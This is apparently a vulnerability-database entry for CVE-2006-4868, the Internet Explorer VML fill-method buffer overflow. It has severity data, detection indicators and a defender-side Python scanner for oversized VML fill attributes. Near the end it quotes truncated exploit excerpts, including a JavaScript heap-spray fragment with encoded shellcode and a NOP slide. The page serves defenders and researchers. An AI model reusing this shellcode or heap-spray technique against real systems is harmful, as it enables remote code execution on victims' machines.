CVE-2006-4868
Published 2006-09-19
Priority: P273 · Severity: critical, CVSS 2.0 base score 9.3
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Tags: ITW, EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 62.15% (99.1st percentile)
Stack-based buffer overflow in the Vector Graphics Rendering engine (vgx.dll), as used in Microsoft Outlook and Internet Explorer 6.0 on Windows XP SP2, and possibly other versions, allows remote attackers to execute arbitrary code via a Vector Markup Language (VML) file with a long fill parameter within a rect tag.
Affected (3 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | outlook | — | — |
Detection & IOCs (extracted from sources)
- Exploit delivers a VML file with a long fill parameter inside a rect (or other VML shape) tag to overflow vgx.dll; look for abnormally large fill= attribute values in VML markup within HTML responses.
- Exploit HTML pages reference the VML behavior namespace binding 'url(#VMLRender)' or 'url(#default#VML)' in CSS; this pattern in HTTP responses is a strong indicator of CVE-2006-4868 exploitation attempts.
- Metasploit module uses a randomized VML element (rect, roundrect, line, polyline, oval, image, arc, curve) with a fill method overflow buffer composed of repeated Unicode escape sequences (&#xXXXX;) up to 65535 characters; detect oversized fill attributes in VML elements.
- The exploit payload file may be delivered as a Unicode (UTF-16 LE) HTML file starting with the BOM bytes 0xFF 0xFE; network detection should inspect for this magic number in HTTP responses serving HTML content.
- The Metasploit module targets User-Agent strings matching 'Windows 5.[123]' to select a larger overflow buffer (65535); anomalous buffer sizes correlated with specific UA strings can aid detection.
- The return address used in the heap-spray exploit is 0x0c0c0c0c (classic heap spray target); memory access violations or EIP values at 0x0c0c0c0c in iexplore.exe crash dumps indicate exploitation.
- The Metasploit module randomizes the XML namespace prefix, JavaScript variable names, and whitespace in the exploit HTML, making static string-based signatures less reliable; behavioral or heuristic detection is preferred.
- The overflow buffer length varies by target OS: 1024 Unicode chars for most targets, 65535 for Windows 5.x (XP/2003); signatures must account for both sizes.
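A defender-side check that applies the indicators above to an HTTP response body, added here as an example and not taken from any of the sources this page indexes: it handles the UTF-16 LE BOM, the VML behavior binding, a randomized namespace prefix, and measures fill/method values by decoded length so repeated &#xXXXX; escapes are counted once each. The 256-character threshold, the function names and the two sample bodies are assumptions.

```python
import re

# Shape elements named on this page, plus the <prefix:fill> child whose "method" the module overflows.
VML_ELEMENTS = r"rect|roundrect|line|polyline|oval|image|arc|curve|fill"
# The namespace prefix is randomized by the module, so match any prefix rather than just "v".
VML_TAG_RE = re.compile(r"<([A-Za-z_][\w.-]*):(" + VML_ELEMENTS + r")\b([^>]*)>", re.I | re.S)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.S)
BEHAVIOR_RE = re.compile(r"behavior\s*:\s*url\(\s*#(?:VMLRender|default#VML)\s*\)", re.I)
ENTITY_RE = re.compile(r"&#x[0-9A-Fa-f]{1,6};|&#\d{1,7};")
UTF16_BOM = b"\xff\xfe"
FILL_LIMIT = 256  # assumed threshold; well below the 1024/65535-char buffers the page cites


def decoded_length(value):
    # Count each numeric character reference as one character, so an overflow built from
    # repeated &#xXXXX; sequences is measured by its decoded size, not its escaped size.
    return len(ENTITY_RE.sub("\x00", value))


def scan_html(body: bytes):
    """Return the list of CVE-2006-4868 indicators found in one HTML response body."""
    findings = []
    if body.startswith(UTF16_BOM):
        findings.append("utf16le_bom")
        text = body.decode("utf-16-le", errors="replace")
    else:
        text = body.decode("utf-8", errors="replace")
    if BEHAVIOR_RE.search(text):
        # Present on legitimate VML pages too; treat as corroborating, not conclusive.
        findings.append("vml_behavior_binding")
    for m in VML_TAG_RE.finditer(text):
        _prefix, element, attrs = m.groups()
        for a in ATTR_RE.finditer(attrs):
            name = a.group(1).lower()
            value = a.group(2) or a.group(3) or a.group(4) or ""
            if name in ("fill", "method") and decoded_length(value) > FILL_LIMIT:
                findings.append(f"oversized_{name}_in_{element.lower()}")
    return findings


# Constructed sample bodies (not taken from the page's exploit listings).
BENIGN = (b'<html><style>v\\:* { behavior: url(#default#VML); }</style>'
          b'<v:rect fillcolor="red"><v:fill method="linear"/></v:rect></html>')
SUSPECT = UTF16_BOM + ('<html><style>x\\:* { behavior: url(#VMLRender); }</style>'
                       '<x:rect><x:fill method="' + '&#x4141;' * 1024 + '"/></x:rect></html>'
                       ).encode("utf-16-le")

if __name__ == "__main__":
    print(scan_html(BENIGN))
    print(scan_html(SUSPECT))
```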
CVSS provenance
- NVD: CVSS v2.0 9.3 CRITICAL, vector AV:N/AC:M/Au:N/C:C/I:C/A:C
- VulnCheck: 9.3 CRITICAL
GHSA
GHSA-57hx-f9jp-528m (ghsa_unreviewed, 2022-05-01): CVE-2006-4868 [HIGH] CWE-119
VulnCheck
Microsoft Windows Improper Restriction of Operations within the Bounds of a Memory Buffer (vulncheck, 2006, CVSS 9.3)
CVE-2006-4868 [CRITICAL]
Affected: Microsoft Windows
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://learn.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-055; https://betanews.com/2008/05/19/ten-thousand-servers-hit-in-sql-injection-hack/
No detection rules found.
Exploit-DB
Microsoft Internet Explorer - 'VML' Fill Method Code Execution (MS06-055) (Metasploit) (exploitdb, 2010-07-03)
---
##
# $Id: ms06_055_vml_method.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Internet Explorer VML Fill Method Code Execution',
'Description' => %q{
This module exploits a code execution vulnerability in Microsoft Internet Explorer using
a buffer overflow in the VML processing code (VGX.dll). This module has been tested on
Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.
},
'License' => MSF_LICENSE,
'Author'
Exploit-DB
Microsoft Internet Explorer - 'VML' Remote Buffer Overflow (SP2) (exploitdb, 2006-09-25)
---
#!/usr/bin/perl
#
# Microsoft Internet Explorer VML Remote Buffer Overflow (Windows XP SP2)
#
# Author: Trirat Puttaraksa (Kira)
#
# Credits: Niega
#
# [UPDATE Sep 24]
# At the first time, I decide to release this exploit on Oct 10.
# However, if u see this exploit before Oct 10, it is because of one
# of the following reason:
# 1. M$ release early than Oct 10 (may be impossible, lol)
# 2. there is someone already publish the exploit, so there is no means
# to still keep it private
# I'm already publish things about XP SP2 in my log :)
#
# http://sf-freedom.blogspot.com
#
###############################################################################
# For educational purpose only
#
# Note: This exploit is modified from
Exploit-DB
Microsoft Internet Explorer (Windows XP SP2) - 'VML' Remote Buffer Overflow (exploitdb, 2006-09-24)
---
v\:* { behavior: url(#VMLRender); }
var heapSprayToAddress = 0x05050505;
var payLoadCode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u9090%u9090");
spraySlide = getSpraySlide(spra
Metasploit
MS06-055 Microsoft Internet Explorer VML Fill Method Code Execution (metasploit)
This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.
No writeups or analysis indexed.